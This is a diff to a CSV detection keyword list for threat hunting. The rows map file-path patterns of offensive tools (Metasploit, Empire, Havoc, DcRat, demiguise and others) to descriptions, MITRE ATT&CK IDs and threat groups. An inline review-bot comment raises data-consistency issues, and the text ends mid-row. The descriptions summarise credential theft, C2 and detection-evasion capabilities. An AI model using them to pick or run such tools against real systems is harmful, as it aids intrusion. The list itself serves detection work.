security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/data/empire.db*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*/data/exploits/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/data/shellcode*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/DavRelayUp.git*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" -"*/DavRelayUp/*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*/data/exploits/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/data/nxc.conf*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/data/shellcode*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/DavRelayUp.git*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*/DavRelayUp/*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*/daytime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dazzleUP.git*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" -"*/db2_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/db2_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/db2-das-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dbc2Loader*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/DCOM Lateral Movement/*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" -"*/dcomhijack.git*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","228","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*/dcomhijack.git*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*/DCOMPotato.git*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" 
-"*/DcRat.git*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*/DcRat.sln*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*/DcRat.git*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*/DcRat.sln*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*/dcrypt.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*/dcrypt_setup.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" -"*/dcsync_*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/dcsync_*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/DeathStar/DeathStar.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/deb.parrot.sh/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DebugAmsi.git*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" 
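Review bot: The two added NetExec rows (`*/daclread.py*` and `*/data/nxc.conf*`) set `metadata_category` to `Credential Access`, but their `metadata_tool_tactics` value `TA0007 - TA0003 - TA0002 - TA0001` has no TA0006, so a rule set filtered by tactic and one filtered by category will disagree about these rows. Either extend the tactics to `TA0007 - TA0003 - TA0002 - TA0001 - TA0006` or choose a category that matches the tactics already listed. `*/daclread.py*` is a bare script filename rather than a repository path, so it may also match copies of that script shipped by other projects; `metadata_comment` is `N/A` on this row and could carry a short false-positive note, as the Egress-Assess row in this hunk uses that column for a caveat. Separately, the metasploit rows rewritten in this hunk still carry `T1204 -T1210` with the space missing before `T1210`, which a consumer splitting the techniques column on ` - ` would read as a single token.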
@@ -3282,19 +3290,19 @@ "*/decrypted.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*/deepce.sh *--install*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/defanger.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*/DefaultCreds_db.json*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4664","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/DefaultCreds_db.json*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" "*/defender-exclusions/*defender*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/defender-exclusions/*exclusion*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/Defense_Evasion.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*/DelegationBOF/*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*/DelegationBOF/*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*/deluge-rpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*/demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "*/demo_bof.c*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" -"*/demon.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/demon.x64.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/demon1.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/demosyscalls.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - 
